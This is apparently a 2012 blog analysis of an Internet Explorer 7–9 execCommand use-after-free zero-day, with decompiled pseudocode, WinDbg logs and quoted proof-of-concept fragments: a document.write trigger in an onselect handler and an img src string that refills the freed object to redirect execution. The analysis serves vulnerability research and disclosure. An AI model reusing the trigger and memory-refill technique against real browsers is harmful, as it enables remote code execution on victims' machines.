首页 » 安全分析 » 正文

IE execCommand function Use after free Vulnerability 0day en

IE execCommand function Use after free Vulnerability 0day

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day

vulnerability information
software version:ie7 ie8 ie9
analyst :instruder of code audit labs of vulnhunt.com

description of the vulnerability
yesterday,eromang capture an IE zero-Day in his blog on http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
Confirmed that it can lead IE7\IE8\IE9 of full-patch to execution code, and the zero-Day attack has been found in the wild. Then, vulnhunt in-depth analysis and confirmed the vulnerability, following is analysis process of the zero-Day vulnerability.

When the execCommand function of IE execute a command event, will allocated the corresponding CMshtmlEd object by AddCommandTarget function, and then call mshtml@CMshtmlEd::Exec();function execution.
But, after the execCommand function to add the corresponding event, will immediately trigger and call the corresponding event function. Through the document.write(“L”) function to rewrite html in the corresponding event function be called. Thereby lead IE call CHTMLEditor::DeleteCommandTarget to release the original applied object of CMshtmlEd, and then cause triggered the used-after-free vulnerability when behind execute the msheml!CMshtmlEd::Exec() function,

Pseudocode

CEditRouter__ExecEditCommand()<br />
{<br />
if(CEditRouter__SetInternalEditHandler())<br />
{<br />
mshtml!CMshtmlEd::Exec();<br />
}<br />
}<br />
CEditRouter__SetInternalEditHandler()<br />
{<br />
CHTMLEditor::AddCommandTarget();<br />
}<br />
CHTMLEditor::AddCommandTarget()<br />
{<br />
int v3; // eax@1<br />
int v4; // ecx@1<br />
int v5; // edi@1<br />
int v6; // esi@1<br />
int result; // eax@4</p>
<p>v5 = a1;<br />
v3 = (int)HeapAlloc(g_hProcessHeap, 8u, 0x88u);<br />
v6 = 0;<br />
if ( v3 )<br />
v6 = CMshtmlEd__CMshtmlEd(v4, v3, a2, 0);<br />
}</p>
<p>AddCommandTarget()之后立马触发事件调用TestArray函数</p>
<p>function TestArray()</p>
<p>{</p>
<p>document.write("L");<br />
//站位<br />
parent.jifud[L].src = "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";<br />
}</p>
<p>document.write("L")会调用DeleteCommandTarget函数CMshtmlEd对象Release函数</p>
<p>int __stdcall CHTMLEditor__DeleteCommandTarget(int a1, struct IUnknown *a2)<br />
{<br />
int v2; // ebx@1<br />
int v3; // edi@1<br />
int v4; // esi@2</p>
<p>v2 = a1;<br />
v3 = CHTMLEditor__FindCommandTarget(a2, (int)&amp;a1);<br />
if ( !v3 )<br />
{<br />
v4 = a1;<br />
v3 = CImplPtrAry__DeleteByValue(v2 + 108, a1);<br />
CMshtmlEd::Release();<br />
}<br />
return v3;<br />
}<br />

parent.jjfud[L].src statement, fake the released memory, see the following analysis
mshtml!CMshtmlEd::Exec will be called to execute command ,after the CEditRouter__SetInternalEditHandler() function completes, but the CMshtmlEd object has been released, so leading the used-after-free vulnerability.

Vulnerability analysis

When execute document.execCommand(“selectAll”) statement in POC, IE will call CEditRouter__ExecEditCommand function, the fuction will first called CEditRouter__SetInternalEditHandler, and then call CHTMLEditor::AddCommandTarget to add the corresponding command event.
(using the vm snapshot analysis, the address is the same every time:)
To new CMshtmlEd object

0:008&gt; g<br />
Breakpoint 4 hit<br />
eax=0214be4c ebx=002072a8 ecx=0022d898 edx=00000004 esi=002072a8 edi=0214be4c<br />
eip=6359daaf esp=0214be18 ebp=0214be30 iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
mshtml!CHTMLEditor::AddCommandTarget+0x1a:<br />
6359daaf ff1564135863    call    dword ptr [mshtml!_imp__HeapAlloc (63581364)] ds:0023:63581364={ntdll!RtlAllocateHeap (7c9300c4)}<br />
0:008&gt; dd esp<br />
0214be18  00150000 00000008 00000088 00000001</p>
<p>0:008&gt; g<br />
Breakpoint 5 hit<br />
eax=002385a8 ebx=002072a8 ecx=7c9301db edx=00000088 esi=002072a8 edi=0214be4c<br />
eip=6359dab5 esp=0214be24 ebp=0214be30 iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
mshtml!CHTMLEditor::AddCommandTarget+0x20:<br />
6359dab5 33f6            xor     esi,esi</p>
<p>0:008&gt; dd 002385a8<br />
002385a8  00000000 00000000 00000000 00000000<br />
002385b8  00000000 00000000 00000000 00000000</p>
<p>ChildEBP RetAddr  Args to Child<br />
0214be30 6385ac44 00239cf8 02f5e1f0 02e90210 mshtml!CHTMLEditor::AddCommandTarget+0x20<br />
0214be58 637d41c5 00239cf8 02e90210 0214be94 mshtml!CHTMLEditor::GetCommandTarget+0x94<br />
0214be70 637d4091 00239cf8 02e90210 0214be94 mshtml!CHTMLEditorProxy::GetCommandTarget+0x1e<br />
0214be98 637d4355 00000000 0023d6a0 00000001 mshtml!CEditRouter::SetInternalEditHandler+0x64<br />
0214bebc 637be2fc 6361bad0 0000001f 00000002 mshtml!CEditRouter::ExecEditCommand+0xac<br />
0214c278 638afda7 0352a188 6361bad0 0000001f mshtml!CDoc::ExecHelper+0x3c91<br />
0214c298 638ee2a9 0352a188 6361bad0 0000001f mshtml!CDocument::Exec+0x24<br />
0214c2c0 638b167b 037c6940 0000001f 0214000a mshtml!CBase::execCommand+0x50                //execCommand<br />
0214c2f8 638e7445 00000001 037c6940 00000000 mshtml!CDocument::execCommand+0x93<br />
0214c370 636430c9 0352a188 037c3e78 001fbbb0 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149<br />
0214c3e4 63643595 0352a188 00000429 00000001 mshtml!CBase::ContextInvokeEx+0x5d1<br />
0214c410 63643832 0352a188 00000429 00000001 mshtml!CBase::InvokeEx+0x25<br />
0214c460 635e1cdc 0352a188 0000000b 00000429 mshtml!DispatchInvokeCollection+0x14b<br />
0214c4a8 63642f30 0352a188 00000429 00000001 mshtml!CDocument::InvokeEx+0xf1<br />
0214c4d0 63642eec 0352a188 00000429 00000001 mshtml!CBase::VersionedInvokeEx+0x20<br />
0214c520 633a6d37 001fb9d0 00000429 00000001 mshtml!PlainInvokeEx+0xea<br />
0214c560 633a6c75 037b0550 00000429 00000409 jscript!IDispatchExInvokeEx2+0xf8<br />
0214c59c 633a9cfe 037b0550 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a<br />
0214c65c 633a9f3c 00000429 00000001 00000000 jscript!InvokeDispatchEx+0x98<br />
0214c690 633a77ff 037b0550 0214c6c4 00000001 jscript!VAR::InvokeByName+0x135

Here filling above the allocated memory

mshtml!CMshtmlEd::CMshtmlEd:<br />
6359de45 8bff            mov     edi,edi<br />
6359de47 55              push    ebp<br />
6359de48 8bec            mov     ebp,esp<br />
6359de4a 52              push    edx<br />
6359de4b 8d4a18          lea     ecx,[edx+18h]<br />
6359de4e c702a49e6363    mov     dword ptr [edx],offset mshtml!CMshtmlEd::`vftable' (63639ea4)<br />
6359de54 e82f000000      call    mshtml!CSpringLoader::CSpringLoader (6359de88)<br />
6359de59 8b4508          mov     eax,dword ptr [ebp+8]</p>
<p>0:008&gt; p<br />
eax=002072a8 ebx=002072a8 ecx=002384a0 edx=00238488 esi=00000000 edi=00207334<br />
eip=6359de5c esp=0214bdfc ebp=0214bdfc iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
mshtml!CMshtmlEd::CMshtmlEd+0x17:<br />
6359de5c 33c9            xor     ecx,ecx<br />
0:008&gt; dds eax<br />
002072a8  6361c190 mshtml!ATL::CComObject::`vftable'</p>
<p>6359de5c 33c9            xor     ecx,ecx<br />
6359de5e 394d0c          cmp     dword ptr [ebp+0Ch],ecx<br />
6359de61 894208          mov     dword ptr [edx+8],eax      填充 CHTMLEditor vtable</p>
<p>0:008&gt; g<br />
Breakpoint 2 hit<br />
eax=002072a8 ebx=002072a8 ecx=00000000 edx=002385a8 esi=00000000 edi=0214be4c<br />
eip=6359de64 esp=0214be14 ebp=0214be14 iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
mshtml!CMshtmlEd::CMshtmlEd+0x1f:<br />
6359de64 0f95c1          setne   cl</p>
<p>0:008&gt; dd 002385a8<br />
002385a8  63639ea4 00000000 002072a8 00000000<br />
002385b8  00000000 00000000 00000000 00000000</p>
<p>int __userpurge CHTMLEditor__AddCommandTarget(int a1, int a2, int a3)<br />
{<br />
int v3; // eax@1<br />
int v4; // ecx@1<br />
int v5; // edi@1<br />
int v6; // esi@1<br />
int result; // eax@4</p>
<p>v5 = a1;<br />
v3 = (int)HeapAlloc(g_hProcessHeap, 8u, 0x88u);<br />
v6 = 0;<br />
if ( v3 )<br />
v6 = CMshtmlEd__CMshtmlEd(v4, v3, a2, 0);<br />
*(_DWORD *)v5 = v6;<br />
………<br />
}<br />
int __fastcall CMshtmlEd__CMshtmlEd(int a1, int a2, int a3, int a4)<br />
{<br />
int v5; // edx@1</p>
<p>*(_DWORD *)a2 = &amp;CMshtmlEd___vftable_;<br />
CSpringLoader__CSpringLoader(a2);<br />
*(_DWORD *)(v5 + 8) = a3;<br />
*(_DWORD *)(v5 + 4) = 1;<br />
*(_DWORD *)(v5 + 132) ^= (*(_DWORD *)(v5 + 132) ^ 2 * (a4 != 0)) &amp; 2;<br />
return v5;<br />
}<br />

After the above addCommandTarget function, will trigger the selectAll event, the corresponding registration function of this event is “onselect=’TestArray’”

testarray

document.write(“L”) statement in POC will trigger and call the mshtml!CHTMLEditor::DeleteCommandTarget function, and release the original CMshtmlEd object.
bu RtlFreeHeap “.echo free heap;db poi(esp+c) l8;kb;.if(poi(esp+c)==0×002385a8){} .else{g}”
CHTMLEditor::DeleteCommandTarget will invoke CMshtmlEd::Release function to release the object.

int __stdcall CHTMLEditor__DeleteCommandTarget(int a1, struct IUnknown *a2)<br />
{<br />
int v2; // ebx@1<br />
int v3; // edi@1<br />
int v4; // esi@2</p>
<p>v2 = a1;<br />
v3 = CHTMLEditor__FindCommandTarget(a2, (int)&amp;a1);<br />
if ( !v3 )<br />
{<br />
v4 = a1;<br />
v3 = CImplPtrAry__DeleteByValue(v2 + 108, a1);<br />
(*(void (__stdcall **)(int))(*(_DWORD *)v4 + 8))(v4); //CMshtmlEd::Release<br />
}<br />
return v3;<br />
}</p>
<p>调试log:</p>
<p>free heap<br />
002385a8  a4 9e 63 63 00 00 00 00                          ..cc....<br />
ChildEBP RetAddr  Args to Child<br />
0214826c 6375bf26 00150000 00000000 002385a8 ntdll!RtlFreeHeap<br />
02148284 639d53d6 002385a8 002072a8 00000000 mshtml!CMshtmlEd::Release+0x25<br />
0214829c 639d0d30 002385a8 0380e628 00000000 mshtml!CHTMLEditor::DeleteCommandTarget+0x34<br />
021482c8 6385ac12 021482ec 6361c270 002072a8 mshtml!CHTMLEditor::RemoveContainer+0x15f<br />
021482d0 6361c270 002072a8 0000000f 0022db20 mshtml!CHTMLEditor::Notify+0x26<br />
021482ec 6360feb4 002072a8 0000000f 0022db20 mshtml!CHTMLEditorProxy::Notify+0x21<br />
02148308 637e6671 0022db20 00000000 0022d970 mshtml!CDoc::NotifySelection+0x59<br />
02148370 637525ff 0022d970 00000000 00000003 mshtml!COmWindowProxy::SwitchMarkup+0x347<br />
0214846c 637561c5 03818ce8 00000000 00000000 mshtml!CDocument::open+0x417<br />
021484e8 63774271 03818ce8 0380e668 04824fc0 mshtml!CDocument::write+0x7c

Execution parent.jifud[L].src = “YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH”; ++L;statement, in POC, will invoke the following process to apply for a piece of memory, and then later copy the src content of poc.

0:008&gt; r<br />
eax=00000082 ebx=04827140 ecx=63680000 edx=04827142 esi=00000040 edi=02148560<br />
eip=636560eb esp=02148538 ebp=0214854c iopl=0         nv up ei pl nz na po nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202<br />
mshtml!StripCRLF+0x41:<br />
636560eb ff1564135863    call    dword ptr [mshtml!_imp__HeapAlloc (63581364)] ds:0023:63581364={ntdll!RtlAllocateHeap (7c9300c4)}<br />
0:008&gt; dd esp<br />
02148538  00150000 00000000 00000082 002301f8</p>
<p>0:008&gt; g<br />
Breakpoint 6 hit<br />
eax=002385a8 ebx=04827140 ecx=7c9301db edx=0000000e esi=00000040 edi=02148560<br />
eip=636560f1 esp=02148544 ebp=0214854c iopl=0         nv up ei pl zr na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246<br />
mshtml!StripCRLF+0x47:<br />
636560f1 85c0            test    eax,eax<br />
0:008&gt; kb<br />
ChildEBP RetAddr  Args to Child<br />
0214854c 63680b40 00000000 00000000 0022f850 mshtml!StripCRLF+0x56<br />
02148564 6368a69f 636509bc 04896ef8 0022f850 mshtml!BASICPROPPARAMS::SetUrlProperty+0x17<br />
02148580 6366906f 0022f850 04896ef8 04894648 mshtml!CImgElement::put_src+0x1b<br />
021485b0 636430c9 0022f850 04894648 036f1580 mshtml!GS_BSTR+0x1ab<br />
02148624 6366418a 0022f850 000003eb 00000001 mshtml!CBase::ContextInvokeEx+0x5d1<br />
02148674 63686ed8 0022f850 000003eb 00000001 mshtml!CElement::ContextInvokeEx+0x9d<br />
021486a0 63642eec 0022f850 000003eb 00000001 mshtml!CImgElement::VersionedInvokeEx+0x64<br />
021486f0 633a6d37 002254e0 000003eb 00000001 mshtml!PlainInvokeEx+0xea<br />
02148730 633a6c75 04892c30 000003eb 00000409 jscript!IDispatchExInvokeEx2+0xf8<br />
0214876c 633a9cfe 04892c30 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a<br />
0214882c 633a9f3c 000003eb 00000004 00000000 jscript!InvokeDispatchEx+0x98<br />
02148860 633a77ff 04892c30 02148894 0000000c jscript!VAR::InvokeByName+0x135<br />
021488a8 633a75bf 04892c30 0000000c 00000000 jscript!VAR::InvokeDispName+0x7a<br />
02148a3c 633a5ab0 02148a54 02148b9c 02148b9c jscript!CScriptRuntime::Run+0x1f27<br />
02148b24 633a59f7 02148b9c 00000000 009afe00 jscript!ScrFncObj::CallWithFrameOnStack+0xff<br />
02148b70 633a5743 02148b9c 00000000 009afe00 jscript!ScrFncObj::Call+0x8f<br />
02148bec 633a8bc7 04897c30 0214afe8 00000000 jscript!CSession::Execute+0x175<br />
02148cd4 633a8a35 04897c30 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8<br />
02148d58 633a6d37 04897c30 00000000 00000001 jscript!NameTbl::InvokeEx+0x129<br />
02148d98 633a6c75 04892c30 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8</p>
<p>signed int __userpurge StripCRLF(int a1, unsigned __int16 *a2, unsigned __int16 **a3)<br />
//站位 拷贝<br />
buffer = HeapAlloc(g_hProcessHeap, 0, 2 * v7 + 2);<br />
*(_DWORD *)a1 = buffer;<br />
if ( buffer )<br />
{<br />
while ( v7 &gt; 0 )<br />
{<br />
v8 = *v3;<br />
if ( *v3 != '\r' )<br />
{<br />
if ( v8 != '\n' )<br />
{<br />
*(_WORD *)buffer = v8;<br />
buffer = (char *)buffer + 2;<br />
}<br />
}<br />
++v3;<br />
--v7;<br />
}<br />
*(_WORD *)buffer = 0;<br />
}<br />

After the above process, to the mshtml!CMshtmlEd::Exec function, however CMshtmlEd has been released and the memory location be refilled ,leading to arbitrary code execution.

Breakpoint 1 hit<br />
eax=00000000 ebx=0000001f ecx=00206910 edx=0000000d esi=00000000 edi=00237ee0<br />
eip=637d464b esp=0214be80 ebp=0214be8c iopl=0         nv up ei pl nz na pe nc<br />
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206<br />
mshtml!CMshtmlEd::Exec+0x131:<br />
637d464b 8b7f08          mov     edi,dword ptr [edi+8] ds:0023:00237ee8=0c0c0c08<br />
0:008&gt; kb<br />
ChildEBP RetAddr  Args to Child<br />
0214be8c 637d4387 00237ee0 6361bad0 0000001f mshtml!CMshtmlEd::Exec+0x131<br />
0214bebc 637be2fc 6361bad0 0000001f 00000002 mshtml!CEditRouter::ExecEditCommand+0xd6<br />
0214c278 638afda7 036fee20 6361bad0 0000001f mshtml!CDoc::ExecHelper+0x3c91<br />
0214c298 638ee2a9 036fee20 6361bad0 0000001f mshtml!CDocument::Exec+0x24<br />
0214c2c0 638b167b 04896e80 0000001f 0214000a mshtml!CBase::execCommand+0x50<br />
0214c2f8 638e7445 00000001 04896e80 00000000 mshtml!CDocument::execCommand+0x93<br />
0214c370 636430c9 036fee20 04894320 036fe9a0 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149<br />
0214c3e4 63643595 036fee20 00000429 00000001 mshtml!CBase::ContextInvokeEx+0x5d1<br />
0214c410 63643832 036fee20 00000429 00000001 mshtml!CBase::InvokeEx+0x25<br />
0214c460 635e1cdc 036fee20 0000000b 00000429 mshtml!DispatchInvokeCollection+0x14b<br />
0214c4a8 63642f30 036fee20 00000429 00000001 mshtml!CDocument::InvokeEx+0xf1<br />
0214c4d0 63642eec 036fee20 00000429 00000001 mshtml!CBase::VersionedInvokeEx+0x20<br />
0214c520 633a6d37 0019ff98 00000429 00000001 mshtml!PlainInvokeEx+0xea<br />
0214c560 633a6c75 04892c30 00000429 00000409 jscript!IDispatchExInvokeEx2+0xf8<br />
0214c59c 633a9cfe 04892c30 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a<br />
0214c65c 633a9f3c 00000429 00000001 00000000 jscript!InvokeDispatchEx+0x98<br />
0214c690 633a77ff 04892c30 0214c6c4 00000001 jscript!VAR::InvokeByName+0x135<br />
0214c6dc 633a85c7 04892c30 00000001 00000000 jscript!VAR::InvokeDispName+0x7a<br />
0214c708 633a9c0b 04892c30 00000000 00000001 jscript!VAR::InvokeByDispID+0xce<br />
0214c8a4 633a5ab0 0214c8bc 0214ca04 0214ca04 jscript!CScriptRuntime::Run+0x2989

Crash info

crash

Mitigation measures
Temporary use other browsers to replace until Microsoft patched the vulnerability

Thanks binjo :)